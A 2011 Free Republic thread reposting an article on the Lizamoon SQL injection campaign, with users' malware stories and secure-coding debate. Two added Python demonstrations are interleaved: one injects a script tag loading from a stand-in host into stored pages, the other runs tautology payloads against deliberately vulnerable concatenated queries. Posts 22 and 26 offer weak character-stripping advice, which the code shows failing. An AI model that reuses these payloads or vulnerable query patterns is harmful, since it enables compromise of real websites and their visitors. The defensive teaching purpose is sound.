Free Republic
News/Activism


Thousands of Web Sites Hit With New Twist on Old SQL Injection Hack
newenterprise.allthingsd.com | Posted on April 1, 2011 at 1:10 PM PT | by Arik Hesseldahl

Posted on 04/01/2011 1:52:38 PM PDT by Red Badger

A relatively simple hack has been used to compromise at least 500,000 Web sites, and perhaps as many as 1.5 million, in such a way that visitors are tricked into downloading fake PC security software.

Dubbed Lizamoon, after the Web site where some users are in some cases redirected, the attack was first documented by the security research firm Websense. The hack seeks to trick Web users into believing that their computer has been compromised by viruses and prompts them to download fake security software that itself causes further problems. Among the sites serving up the links to the fake software sites are some belonging to Apple and used on its iTunes store, though Apple is said to have cleaned up the affected code on its site.

Websense says that so far it appears that sites using Microsoft SQL Server 2003 and 2005 are at risk, though as yet SQL Server 2008 doesn’t appear to be affected. No word yet from Microsoft about any of this, though I’ve asked them for a comment.

SQL injection attacks take place when malicious code–essentially commands to a Web server to do things it’s not supposed to do–is inserted into routine queries of a Web site’s database. A basic way to carry out these attacks is to add extra commands into the URL bar of the browser when visiting a vulnerable Web site. It’s not entirely clear exactly how this series of attacks has been carried out.

I talked with Josh Shaul, CTO of Application Security, Inc., a database security vendor that specializes in researching attacks on databases. “It’s a very new take on a very old type of attack,” Shaul said. “SQL injection has been the primary way that databases have been attacked for years. What’s different here is that people are putting the code that runs their Web sites in the database itself. And that’s what’s so troubling. Effectively you’ve exposed your code to an attacker so they can go modify it.”

Attackers found hundreds of thousands of sites that use a single user account to query their databases for all visitors, Shaul said. “The databases are clearly configured in an insecure way,” he said. “That’s what it all comes down to. Why is it that the log-in to use the database has the right to modify the code for the Web site itself? That makes no sense at all.”

In this case the attackers took advantage of the weakness to insert a script that creates a pop-up that sends a site’s visitors to another site that looks like a legitimate place to download new Microsoft security software. That makes the attack on the Web sites themselves just a means to an end–the end being tricking innocent Web users into clicking on a series of links and paying to download fake security software.

Websense produced a video demonstrating what happens. The short lesson is this: If you see a pop-up that tells you you’ve got a virus or that your computer is compromised by a bunch of security issues, don’t click any of the links in it; it’s probably not legit.


TOPICS: Business/Economy; Crime/Corruption; Culture/Society; Technical
KEYWORDS: computers; internetsecurity; malware; virus

1 posted on 04/01/2011 1:52:42 PM PDT by Red Badger

To: ShadowAce

PING!.............


2 posted on 04/01/2011 1:53:23 PM PDT by Red Badger (I've posted a total of 1,698 threads and 63,835 replies, as of 03-29-2011......)

To: Red Badger

Thanks for posting.

Yesterday, I visited a new site and experienced this. A screen pretending to be a spyware/virus checker appeared to be doing a real-time scan of the machine and all sorts of threats were getting “x” marks. It happened nearly instantaneously, which was suspicious because all my security checkers take a LONG time to scan my machine. Then a fake dialog box popped up pretending to be a MS security alert. I was able to shut the entire browser off, then run MalwareBytes, which did find one infected file. Now I need to run Spybot Search & Destroy.


3 posted on 04/01/2011 2:00:26 PM PDT by ProtectOurFreedom

To: Red Badger

There is no excuse for SQL injection. These web sites are probably hack ASP code running on IIS.

If you use a J2EE data access framework like Hibernate, such attacks are impossible.

If you are writing in an old-fashioned environment, you should at least validate the user input. The coders are probably so dumb, they think that having a dropdown protects them. But if I can view your HTML, I can do a POST with any data I want.


4 posted on 04/01/2011 2:17:41 PM PDT by proxy_user

To: proxy_user
If you use a J2EE data access framework like Hibernate, such attacks are impossible.

Or just writing parameterized statements using JDBC should also be sufficient, or just using Stored Procedures. It's amazing, when I have interviewed potential candidates for coding positions, how few know about Cross-Site Scripting and SQL Injection attacks. If you don't know those things, you are DOA as far as I'm concerned as for getting a position on my team.

5 posted on 04/01/2011 2:24:25 PM PDT by dfwgator
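The mechanism the article describes (a query built by concatenation, a stacked UPDATE that appends a script tag to page content kept in the database, and a Web login that is allowed to write that content), together with the parameterized alternative dfwgator mentions above, as an added example in Python against SQLite. This is not code from the article, from Websense, or from any poster. SQLite stands in for SQL Server, `executescript` stands in for a driver that runs batched statements, and the `pages` table, the `page` URL parameter, the redirect host `example.invalid` and the payload are all constructed for illustration; the real campaign walked every text column through a cursor, not one table.

```python
"""
Added example, not code from the article, Websense, or any poster: a small
model of the pattern the article describes, using SQLite in place of SQL
Server.  The table, the redirect host (example.invalid) and the payload are
constructed for illustration.
"""
import os
import shutil
import sqlite3
import tempfile
from pathlib import Path
from urllib.parse import unquote_plus, urlsplit

# Hypothetical script tag the attacker wants appended to every stored page.
PAYLOAD_SCRIPT = '<script src="http://example.invalid/ur.php"></script>'

# Constructed attack URL: closes the quote, stacks an UPDATE over the whole
# content table, then comments out the rest of the original query.
ATTACK_URL = ("http://site.example/view.asp?page=x'; "
              "UPDATE pages SET body = body || '" + PAYLOAD_SCRIPT + "'; --")


def create_site_db(path):
    """A CMS-style table that keeps page markup in the database."""
    con = sqlite3.connect(path)
    con.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, slug TEXT, body TEXT);
        INSERT INTO pages(slug, body) VALUES ('home', '<h1>Home</h1>');
        INSERT INTO pages(slug, body) VALUES ('about', '<h1>About</h1>');
    """)
    con.commit()
    con.close()


def query_param(url, name):
    """Minimal query-string lookup (parse_qs on older Pythons also splits on
    ';', the very character the stacked payload relies on)."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return ""


def vulnerable_lookup(con, url):
    """Query built by string concatenation and handed to a driver that runs
    batched statements (executescript stands in for ADO/SQL Server batches).
    Whatever follows 'page=' in the URL becomes part of the SQL."""
    slug = query_param(url, "page")
    con.executescript("SELECT body FROM pages WHERE slug = '" + slug + "';")
    con.commit()


def safe_lookup(con, url):
    """Same lookup with a bound parameter: the slug is data, never SQL."""
    slug = query_param(url, "page")
    row = con.execute("SELECT body FROM pages WHERE slug = ?", (slug,)).fetchone()
    return row[0] if row else None


def infected(con):
    """One flag per stored page: does it now carry the injected script?"""
    return [PAYLOAD_SCRIPT in body for (body,) in con.execute("SELECT body FROM pages")]


def demo():
    """Three configurations; returns what each one lets the attacker do."""
    tmp = tempfile.mkdtemp()
    path = os.path.join(tmp, "site.db")
    out = {}
    try:
        # 1. Concatenated SQL plus a login that may write: every page is hit.
        create_site_db(path)
        con = sqlite3.connect(path)
        vulnerable_lookup(con, ATTACK_URL)
        out["vuln_every_page_infected"] = all(infected(con))
        con.close()

        # 2. Same bad code, but the Web login can only read (stand-in for a
        #    SQL Server login granted SELECT only): the UPDATE is refused.
        os.remove(path)
        create_site_db(path)
        ro = sqlite3.connect(Path(path).as_uri() + "?mode=ro", uri=True)
        try:
            vulnerable_lookup(ro, ATTACK_URL)
            out["readonly_blocked"] = False
        except sqlite3.OperationalError:      # "attempt to write a readonly database"
            out["readonly_blocked"] = True
        ro.close()

        # 3. Parameterised query on a writable connection: the payload is just
        #    a slug that matches nothing, and no page is touched.
        con = sqlite3.connect(path)
        out["param_attack_result"] = safe_lookup(con, ATTACK_URL)
        out["param_normal_result"] = safe_lookup(con, "http://site.example/view.asp?page=home")
        out["param_any_infected"] = any(infected(con))
        con.close()
    finally:
        shutil.rmtree(tmp, ignore_errors=True)
    return out
```

Calling `demo()` gives the three outcomes side by side. The second case is Shaul's point in miniature: even with the code left unfixed, a login that was never granted UPDATE cannot rewrite page content, so the single shared account the article describes should have had SELECT rights only. The third case is the fix the code itself needs: with the slug bound as a parameter, the same URL selects nothing and the stacked UPDATE never exists as SQL.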

To: Red Badger
I recognize these pretty quickly, one actually installed when I tried to get out of it, it locked up the whole thing and I had to pay to get my computer cleaned up. Now, when I suspect something is amiss, I pull out the internet cable to stop any download.

A girl in my office was having trouble with one of the computers, she had infected it by innocently following the instructions on the screen. Women.

6 posted on 04/01/2011 2:27:36 PM PDT by Fido969

To: Red Badger

The other thing is that even if you click “Cancel” or the “Close” button, it will still install the malware.

Best thing to do is to just hit Control-Alt-Delete and reboot before any damage is done. Or go to the Windows Task Manager and manually kill all of your browser processes.


7 posted on 04/01/2011 2:27:36 PM PDT by dfwgator

To: Red Badger

And now a bunch of websites are hosted on Content Management applications, like Drupal, Joomla and Wordpress, which stores the web pages in a database, instead of in JSP files or ASP files. So I can see where this could be an issue.


8 posted on 04/01/2011 2:32:12 PM PDT by dfwgator

To: dfwgator

In many internal business applications that are behind the firewall, it may not be necessary to protect against such attacks. If only senior management has access to the application, what’s the point?

I would not be surprised if coders coming from such an environment would not know how to create a site that is accessible from the public internet.


9 posted on 04/01/2011 2:34:19 PM PDT by proxy_user

To: Red Badger

Happened to me the other day at a site I regularly visit but I realized something was amiss.


10 posted on 04/01/2011 2:39:52 PM PDT by Retired Chemist

To: Red Badger

Happened to me the other day at a site I regularly visit but I realized something was amiss.


11 posted on 04/01/2011 2:39:58 PM PDT by Retired Chemist

To: Red Badger

When I shut down my computer yesterday, I noticed the SQL Server Configuration Manager was on the list when I clicked the Start button. That may have nothing to do with this topic.


12 posted on 04/01/2011 2:44:33 PM PDT by Crawdad

To: ProtectOurFreedom
I had this or a similar virus a few months back.

Even after I closed the browser via Windows Task Manager, I was unable to access HTTP addresses, but was able to access HTTPS sites.

I'm now locked down with Fartronics DeepFreeze.

Trolling for graphics to post on FR can be a dangerous practice.

13 posted on 04/01/2011 3:04:02 PM PDT by TexasCajun

To: Red Badger; rdb3; Calvinist_Dark_Lord; GodGunsandGuts; CyberCowboy777; Salo; Bobsat; JosephW; ...

14 posted on 04/01/2011 3:13:06 PM PDT by ShadowAce (Linux -- The Ultimate Windows Service Pack)

To: Red Badger

I wonder if this is the reason I can’t access my Fotki account?


15 posted on 04/01/2011 3:17:40 PM PDT by tubebender (Now hiring Tag Line writers. Full time low pay)

To: TexasCajun

Fartronics???

I thought they were all hot air?


16 posted on 04/01/2011 3:31:59 PM PDT by Mr. Jazzy (Pray for our nation against the enemies of freedom.)

To: Fido969

Whenever I see a popup that I didn’t expect to see, and especially if it’s modal (won’t let you go till you click it), I don’t even give it the courtesy of a click; I just go to task manager and shut down the Explorer process. Thus far, no problems.


17 posted on 04/01/2011 3:38:45 PM PDT by Springfield Reformer (Winston Churchill: No Peace Till Victory!)

To: tubebender

I got this about two days ago.

I couldn’t do anything. At least I had the sense to realize it was fake.
I couldn’t open Malwarebytes.

I tried various fixes.

For me, the file was MEK.exe. It gets into your system 32 file and you can’t delete it...at least I couldn’t. I am sure others can fix this easily.

Being computer illiterate..I just reinstalled Windows.


18 posted on 04/01/2011 3:40:49 PM PDT by RummyChick

To: Red Badger

“The databases are clearly configured in an insecure way,” he said. “That’s what it all comes down to."


19 posted on 04/01/2011 4:05:23 PM PDT by for-q-clinton (If at first you don't succeed keep on sucking until you do succeed)

To: dfwgator

Actually the best thing you can do is NOT browse the web as an administrator and if you do use the UAC that is built into windows 7. That way if something tries to install it will prompt you.


20 posted on 04/01/2011 4:07:49 PM PDT by for-q-clinton (If at first you don't succeed keep on sucking until you do succeed)

To: proxy_user

What’s old fashioned about validating input?


21 posted on 04/01/2011 4:41:28 PM PDT by perfect_rovian_storm (The worst is behind us. Unfortunately it is really well endowed.)

To: proxy_user

Well said. SQL injection is not difficult if you leave the doors wide open in poorly written code. A simple check is, if you are expecting a value of no more than 3 chars in length, truncate the variable to that length. You can also strip many SQL chars before sending a value, and then reject any request string that contains them.


22 posted on 04/01/2011 7:27:28 PM PDT by BornToBeAmerican (Kindness will conquer evil)

To: ProtectOurFreedom
Yesterday, I visited a new site and experienced this.

What browser were you using?

23 posted on 04/01/2011 8:27:25 PM PDT by zeugma (The only thing in the social security trust fund is your children and grandchildren's sweat.)

To: zeugma

FF


24 posted on 04/01/2011 11:02:45 PM PDT by ProtectOurFreedom

To: BornToBeAmerican; perfect_rovian_storm

The method of hand-coding a check for each input field certainly works, but it is tedious, prone to error, and adds costs to the project. If there is time and money pressure, it probably won’t be implemented carefully or at all.

That is why it is much better to use a framework or technology where this is automatically supplied.


25 posted on 04/02/2011 4:29:53 AM PDT by proxy_user

To: proxy_user

I’m not disagreeing with you, but hand-coding is NOT tedious, prone to error, and adds costs to the project.

It is very simple to write a (reusable) sub-routine or function that does this on the fly.


26 posted on 04/04/2011 7:13:49 PM PDT by BornToBeAmerican (Kindness will conquer evil)

To: proxy_user

Oh, I was referring to every returned post after the form has been submitted. Granted, coders should not allow certain values (chars) to be entered in a text field, but this is not where SQL injection comes from. Typically an injected field can be passed in the URL string.

However, it is not too difficult to create a dummy site and send data to the real site. Of course this is easy to check, whether the data is coming from the host or not. Still, this can be worked around using the header string.

Which brings me back to my first point and that is to check, validate and truncate every string that is returned to the host, no matter where from.

The coder should verify everything is legit before the submit button is pressed, but only the ignorant would assume it will always arrive ‘as sent’.

This is probably more info than you wanted.


27 posted on 04/04/2011 7:25:09 PM PDT by BornToBeAmerican (Kindness will conquer evil)
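The three server-side checks debated in posts 4, 22 and 25 through 27 (truncate to the field length, strip SQL characters, or validate against what the form actually offers), run against a small SQLite table as an added example in Python; this is not code from any poster. The `orders` table, the drop-down values and the two payloads are constructed, and the queries are deliberately built by concatenation so that the check in front of them is the only defence, which is the situation those posts discuss.

```python
"""
Added example (not from any poster): the input checks discussed in the
thread, each placed in front of a query that is still built by concatenation.
Field names, the drop-down values and the orders rows are constructed.
"""
import re
import sqlite3

ALLOWED_COLORS = {"red", "green", "blue"}   # what the HTML drop-down offers


def setup():
    """In-memory table with two owners, so a leak across owners is visible."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE orders(id INTEGER PRIMARY KEY, owner TEXT, color TEXT);
        INSERT INTO orders(owner, color) VALUES ('alice', 'red');
        INSERT INTO orders(owner, color) VALUES ('alice', 'blue');
        INSERT INTO orders(owner, color) VALUES ('bob', 'red');
    """)
    return con


# --- three ways of "checking" a field before it reaches the query ----------

def truncate_only(value, max_len=10):
    """Cut to the column's declared length, as one poster suggests."""
    return value[:max_len]


def strip_chars(value):
    """Drop quote, semicolon and comment characters, as another suggests."""
    return re.sub(r"[';\-]", "", value)


def validate_color(value):
    """Allow-list: accept only what the drop-down offers, checked on the
    server no matter what the browser (or a hand-made POST) sent."""
    if value not in ALLOWED_COLORS:
        raise ValueError("unexpected color: %r" % value)
    return value


def validate_id(value):
    """Numeric field: digits only, then converted to an int."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("unexpected id: %r" % value)
    return int(value)


# --- the queries the site runs (concatenation on purpose: the check above
#     is the only thing standing between the request and the SQL) ----------

def orders_by_color(con, owner, color_field):
    sql = ("SELECT id FROM orders WHERE owner = '" + owner +
           "' AND color = '" + color_field + "'")
    return [row[0] for row in con.execute(sql)]


def order_by_id(con, owner, id_field):
    sql = ("SELECT id FROM orders WHERE owner = '" + owner +
           "' AND id = " + id_field)
    return [row[0] for row in con.execute(sql)]


def run_checks():
    """Each check against a payload chosen to fit through it; returns the
    rows alice's session would see, or whether the check rejected the input."""
    con = setup()
    out = {}
    # A POST can carry anything, whatever the drop-down offered (constructed).
    color_payload = "' OR 1=1--"     # exactly 10 chars: survives truncation
    id_payload = "1 OR 1=1"          # no quote or dash: survives stripping

    # Truncation: payload fits the field, owner filter is defeated -> all rows.
    out["truncate_leaks"] = orders_by_color(con, "alice", truncate_only(color_payload))
    # Stripping: the quoted field is neutralised...
    out["strip_color"] = orders_by_color(con, "alice", strip_chars(color_payload))
    # ...but a numeric context needs no quotes, so the same filter leaks.
    out["strip_id_leaks"] = order_by_id(con, "alice", strip_chars(id_payload))
    # Allow-list: both payloads are rejected before any SQL is built.
    try:
        validate_color(color_payload)
        out["allowlist_rejects_color"] = False
    except ValueError:
        out["allowlist_rejects_color"] = True
    try:
        validate_id(id_payload)
        out["allowlist_rejects_id"] = False
    except ValueError:
        out["allowlist_rejects_id"] = True
    # A legitimate request still works after validation.
    out["legit"] = orders_by_color(con, "alice", validate_color("red"))
    return out
```

What `run_checks()` shows: truncation only helps when the payload is longer than the field, stripping quotes does nothing for a numeric context, and the allow-list rejects both while still accepting the values the form really sends. The check is worth keeping as defence in depth, but it belongs in front of a bound parameter, not in place of one.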

To: Red Badger; onyx; Jim Robinson; John Robinson

This just happened again to me. I am fairly certain the virus was linked to Sarah Palin pictures from Rolling Thunder. I wasn’t sure the first time, but the second time, the virus made itself apparent right away. I opened a picture of Sarah from a posting from “Crim”. The posting was about pictures of her on the RT tour commenting about a caption that I didn’t see.

Again, I am not 100%, but it seems apparent.

Good luck, and thanks for all you do. Our appreciation can never be overstated.

Brian


28 posted on 06/01/2011 6:23:41 PM PDT by onona (Yes, my state does suck ! No wait, the POLITICIANS and LIBERALS in my state suck)

To: onona

Thanks very much for telling me, onona.

I only post photos directly from SARAHPAC or other authorized sources. Once those photos are hosted by outside sources, there’s no telling what has happened to them.

I’m so sorry for the trouble you’ve incurred. I’d be crying.


29 posted on 06/01/2011 6:34:03 PM PDT by onyx (If you truly support Sarah Palin and want to be on her busy ping list, let me know!)

To: onyx

I consider myself fortunate, as I was on a laptop from work. They were able to fix both viruses quick and easy.

Yeah, if it was my own PC, crying, swearing, and the like.

One of the lucky ones this time.


30 posted on 06/01/2011 6:47:43 PM PDT by onona (Yes, my state does suck ! No wait, the POLITICIANS and LIBERALS in my state suck)

To: proxy_user
But if I can view your HTML, I can do a POST with any data I want.

And how many basic generic principles of Computer Science do you have to violate to allow "data" to be "executable".

31 posted on 06/01/2011 6:57:09 PM PDT by meadsjn (Sarah 2012, or sooner)

To: Red Badger

32 posted on 06/01/2011 6:58:24 PM PDT by cynwoody
